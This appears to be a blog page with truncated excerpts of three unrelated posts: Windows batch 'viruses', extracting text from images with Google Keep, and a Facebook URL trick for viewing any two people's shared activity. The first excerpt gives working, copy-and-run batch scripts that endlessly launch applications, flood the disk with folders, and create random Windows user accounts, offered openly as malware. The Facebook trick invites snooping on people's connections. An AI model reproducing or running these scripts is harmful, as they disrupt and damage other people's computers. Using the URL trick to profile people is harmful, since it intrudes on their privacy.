Now, here are some small yet extremely dangerous Batch File viruses. You need to just press Ctrl+C (Copy) and Ctrl+V (Paste) code in Notepad. After that save the notepad file as "anyname.bat". Be sure to use '.bat' as extension otherwise it will not work. 1. Application Bomber:- @echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x Function- Once executed, it will start to open different applications repeatedly which will affect system's performance. You can also add application of your choice in above code. 2. Folder Flooder- @echo off :x md %random% /folder. goto x Function- Once executed, it will start to generate folders whose name can be any random number. 3. User Account Flooder:- @echo off :xnet user %random% /add goto x Function- Once executed it will start creating Windows User Accounts whose name can be any random number. 4. Process Crea...
There are times when you want to extract text from images. For instance — You found an interesting image with a quote , and you want to copy its text; Extract mobile number and email form a business card; Modify a printed document but without writing it from the scratch; or You simply want to extract text from a write protected PDF file You want to search for text in a printed document. Extracting text from an image is done with an OCR software (short for optical character recognizer). The program takes an image file (like jpg) as input and returns text (that was present in it) as output. Now, most popular OCR readers are either paid (like CamScanner pro) or not very practical to use (like Onenote’s desktop app). But we want something that is free, works on every device, and off course, it should be highly accurate. And guess what, Google Keep is a perfect solution for this. If you not a...
So you are curious to find out if two people you know on Facebook already; knows each other. And you even want to know, the kind of relationship they have? Are they close friends or only acquaintance. Off-course there is no 100% solution for this, but there is one simple trick that will give you a lot more information about any two people’s relationship on Facebook. When you want to find out if two people already know each other or wants to study their relationship, then copy the paste the following URL and replace the username1 and username2 with the Facebook’s username of those people. https://www.facebook.com/username1?and=username2 This link will bring you to a page listing their mutual friends, photos, and events that they both have shared together. The good part is, it’s not necessary to have those people in your friend list. You can check the relationship between any two people all you need their username. If you ...
Comments
Post a Comment